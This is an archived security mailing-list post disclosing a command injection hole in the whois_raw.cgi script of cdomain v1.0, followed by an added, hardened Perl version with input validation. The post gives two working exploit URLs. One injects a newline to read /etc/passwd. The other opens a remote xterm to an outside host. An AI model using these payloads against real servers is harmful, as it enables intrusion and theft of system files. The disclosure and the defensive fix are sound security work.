Hi,
sorry if this is already known.

There is a problem in whois_raw.cgi, called from whois.cgi.
whois_raw.cgi is part of cdomain v1.0. I don't know if new
versions are vulnerable.

#!/usr/bin/perl
#
# whois_raw.cgi Written by J. Allen Hatch (zoneat_private)
# 04/17/97
#
# This script is part of the cdomain v1.0 package which is available at:
# http://www.your-site.com/~zone/whois.html
...
require ("/usr/lib/perl5/cgi-lib.pl");
...
$fqdn = $in{'fqdn'};
# Fetch the root name and concatenate
# Fire off whois
if ($in{'root'} eq "it") {
    @result=`$whois_cmd_it $fqdn`;
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
    @result="Dettagli non disponibili per il dominio richiesto.";
} else {
    @result=`$whois_cmd $fqdn`;
}
...

The exploit is a banal and well-known problem:

http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

bye,
antirez

--
Salvatore Sanfilippo antirez | md5330at_private | antirezat_private
try hping: http://www.kyuzz.org/antirez antirezat_private
'se la barca non ce l'hai dove uzba te ne vai? se la barca te la ruba, preo.'
(M. Abruscato & O. Carmeci)
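
A hardened form of the lookup quoted above, as an added example that is not part of the original post or of the cdomain package: it validates fqdn against a strict host-name pattern and runs whois without a shell. The whois path and the names valid_fqdn and run_whois are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example, not cdomain code: validate the CGI parameter, then run
# whois without going through /bin/sh.
use strict;
use warnings;

# Assumption: location of the whois client (the post does not show the
# value of $whois_cmd).
my $WHOIS_CMD = '/usr/bin/whois';

# Accept only dot-separated labels of letters, digits and inner hyphens,
# ending in an alphabetic TLD, 253 characters at most. \A and \z anchor the
# whole string; with ^...$ a trailing newline would still match. The pattern
# also guarantees the value cannot start with '-' and be taken as an option.
sub valid_fqdn {
    my ($name) = @_;
    return 0 unless defined $name && length($name) <= 253;
    return $name =~ /\A(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}\z/
        ? 1 : 0;
}

# The list form of open() hands $fqdn to whois as one argv entry, so
# newlines and shell metacharacters are never interpreted, unlike the
# backtick form `$whois_cmd $fqdn` in the quoted script.
sub run_whois {
    my ($fqdn) = @_;
    return ("Invalid domain name.\n") unless valid_fqdn($fqdn);
    open(my $fh, '-|', $WHOIS_CMD, $fqdn)
        or return ("Lookup failed.\n");
    my @result = <$fh>;
    close $fh;
    return @result;
}

# Constructed inputs, including the newline-prefixed value from the post.
# Only the validator is exercised here, so the demo runs offline.
unless (caller) {
    for my $t ("example.com", "\ncat /etc/passwd", "example.com;id", "example.com\n") {
        (my $shown = $t) =~ s/\n/\\n/g;
        printf "%-22s %s\n", "'$shown'", valid_fqdn($t) ? "accepted" : "rejected";
    }
}
```

Only the first constructed input is accepted; the other three are rejected before any process is started.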
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:48:02 PDT